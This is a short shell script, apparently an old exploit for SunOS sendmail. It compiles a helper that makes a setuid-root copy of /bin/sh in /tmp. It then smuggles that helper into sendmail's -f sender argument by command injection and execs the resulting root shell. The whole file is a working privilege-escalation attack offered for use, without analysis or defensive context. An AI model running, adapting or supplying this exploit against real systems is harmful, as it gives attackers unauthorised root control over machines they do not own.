#!/bin/sh
#
# Syntax: roption host
#
# host is any system running sendmail (except localhost).
#
# This exploits a flaw in SunOS sendmail(8), and attempts
# create a suid root shell
#
#
#

PROG="`basename $0`"
PATH=/usr/ucb:/usr/bin:/bin      export PATH
IFS=" "                          export IFS

# Check args
if [ $# -ne 1 ]; then
        echo "Syntax: $PROG host"
        exit 1
fi

# Check we're on SunOS
if [ "x`uname -s`" != "xSunOS" ]; then
        echo "Sorry, this only works on SunOS"
        exit 1
fi

PROG="`basename $0`"

EXECME=/tmp/HotterThanMojaveInMyHeart

# Create EXECME.c

cat > $EXECME.c << 'EOF'
main(argc,argv)
int argc;
char *argv[];
{
        chown("/tmp/InfamousAngel", 0, 0);
        chmod("/tmp/InfamousAngel", 04755);
}
EOF

cc -o $EXECME $EXECME.c

# Check we have EXECME

if [ ! -x $EXECME ]; then
        echo "$PROG: couldnt compile $EXECME.c - check it out"
        exit 1
fi

/bin/cp /bin/sh /tmp/InfamousAngel
# Run sendmail

/usr/lib/sendmail -oR$1 -f";$EXECME;" -t << 'EOF'
To: No1InParticular

Hows it goin
EOF

exec /tmp/InfamousAngel